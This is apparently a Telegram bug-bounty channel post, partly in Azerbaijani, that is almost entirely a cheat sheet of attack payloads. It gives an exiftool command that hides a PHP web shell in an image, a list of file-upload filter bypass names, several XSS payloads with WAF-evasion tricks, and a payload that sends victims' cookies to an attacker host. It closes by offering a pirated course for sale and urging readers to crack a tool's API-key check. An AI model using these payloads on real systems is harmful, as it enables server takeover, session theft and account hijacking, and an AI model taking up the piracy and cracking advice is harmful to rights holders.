https://t.me/bughuntersaz

Qatılarsız

EXIFTOOL + file UPLOAD Tips : $ exiftool \-Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
// File Upload bypass
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
flile.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg

Sesion based xss

"/hrefd=(1%0a%0aoncontentvisibilityautostatechange=confirm(/A00N/)%0d%0astyle=content\-visibility:auto⁣

Multi Context hashtag#XSS Payload

"%26%2339>alert(1)>%26%2339<Svg>

Reflected XSS may lead to ATO

Payload:

"><script>alert(document.cookie)</script>

Simple Tip:

cat parameters.txt | grep ".php?" > php\-params.txt

Test php-params.txt for: sqli, xss, html injection...etc

Attacking Cookies:

https://sub.target.com/en/test.php?vuln\-param="><script>document.write('<img src="https://hacker\-site/thing/?c='%2bdocument.cookie%2b'" />');</script

Stored XSS via cache poisoning ?

the Akamai WAF really annoyed me, but the craft of this payload defeated it :

"><a nope="%26quot;x%26quot;"onmouseover​="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">

Nahamsec in çox babat kursu var satılır bütöv şəkildə udemy kursu ilə birlikdə sadəcə 10 azn istəyən yazsın

@CyberProton

Toolda APİ key ve Mail isteyir oda yoxdu gerek pul verilsin ona) gorun nagarsiz) reverse edin bypass edin gorun